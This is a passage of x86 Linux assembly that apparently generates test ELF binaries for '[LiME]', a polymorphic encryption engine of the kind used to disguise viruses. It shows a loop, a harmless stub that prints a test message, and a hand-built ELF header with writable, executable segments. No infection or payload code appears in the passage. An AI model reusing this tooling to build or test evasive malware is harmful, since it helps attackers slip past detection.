        jbe gen_l2
        inc byte [ebx]
        mov byte [ebx+1],'0'
gen_l2:
        pop ecx
        loop gen_l1

        mov eax,1
        xor ebx,ebx
        int 80h

gen_msg db 'Generates 50 [LiME] encrypted test files...',0dh,0ah
gen_msg_len equ $-gen_msg

host:
        call host_reloc
host_reloc:
        pop ecx
        add ecx,host_msg-host_reloc
        mov eax,4
        mov ebx,1
        mov edx,host_msg_len
        int 80h
        mov eax,1
        xor ebx,ebx
        int 80h

host_msg db 'This is a [LiME] test file! ...('
filename db 't00',0
     db ')',0dh,0ah
host_msg_len equ $-host_msg
host_len equ $-host

elf_head:
e_ident db 7fh,'ELF',1,1,1
        times 9 db 0
e_type  dw 2
e_mach  dw 3
e_ver   dd 1
e_entry dd host_entry-elf_head+08049000h
e_phoff dd 34h
e_shoff dd 0
e_flags dd 0
e_elfhs dw 34h
e_phes  dw 20h
e_phec  dw 01h
e_shes  dw 0
e_shec  dw 0
e_shsn  dw 0
elf_ph:
p_type  dd 1
p_off   dd 0
p_vaddr dd 08049000h
p_paddr dd 08049000h
p_filsz dd file_len
p_memsz dd file_len
p_flags dd 7
p_align dd 1000h
        times 20h db 0
host_entry:
        times 1024*4 db 0

file_len equ $-elf_head